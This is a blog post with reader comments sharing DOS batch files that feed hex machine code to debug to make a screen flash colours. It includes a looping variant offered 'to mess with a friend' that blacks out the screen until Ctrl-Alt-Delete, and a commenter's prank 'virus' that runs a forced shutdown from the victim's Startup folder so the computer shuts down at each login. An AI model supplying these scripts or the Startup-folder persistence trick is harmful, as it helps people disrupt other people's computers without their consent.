To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
This post brought to you courtesy of Pie and my own twist
- Related Articles
- Batch File Trick
- Batch File Colors
14 comments:
What's up with all this spam?
Anyway, thanks for posting my batch file. Never thought of your twist, either.
-Pie
I just want to thank you for letting me know about this awesome trick. I would have asked you first if it was OK to post it, but I didn't have your email. Anyways thanks once again and I'm hoping that some time next week, when I'm not as busy, I'll get a chance to mess around more with this batch file and hopefully improve it even more. What I'd like to do is make it so that it keeps flashing (instead of going black) until the person hits ctrl-alt delete.
Thanks a ton for the great tip!
does this do something to your pc?
coz it says del (delete)
and i thot that deletes an important file
lol ur fucking stupid rambo
lol dont be so harsh :S
Maybe not everyone has spent as much time in front of the pc like you have... couldnt you just have answeard the question maybe? ..
uh...Im on winBLOWZ vista and it says that my system doesn't support fullscreen mode. I tryed the prefernce menu but I didn't see anything about fullscreen mode so any sugestions(i spelled thet wrong)will help. THANKS
What does the file extension z.dbg mean?
First off, del just deletes the file that the batch file made. Second, z.dbg means it's a debug file, since the file is run by debug.
Just a note I noticed. Didn't work on a non-admin account. Perhaps some kind soul could figure out how...
*hint, hint*
it doesn't work for vista
if you copy and paste the following code into notepad and then save it as a .bat file it will make the screen flash green.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C9 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
how can i make it flash for 5 sec or a cycle of 50 times and the auto close? and change colors , im having a hard time figuring out this sequence. thanks!!!
ray jaffa... not working raa
Course, the easiest "virus" to make with a batch file reads as follows...
@echo off
shutdown /f
Save that as a batch file, and put it in their startup folder...
for win7, it's in AppData, Microsoft, Windows, Start Menu, Programs, Startup. (or something like that, can't remember.)
For XP, it's in C:\Documents and Settings\username\Start Menu\Programs\Startup.
The only way they can get rid of it is to log onto a different account, or boot up in safe mode.
Post a Comment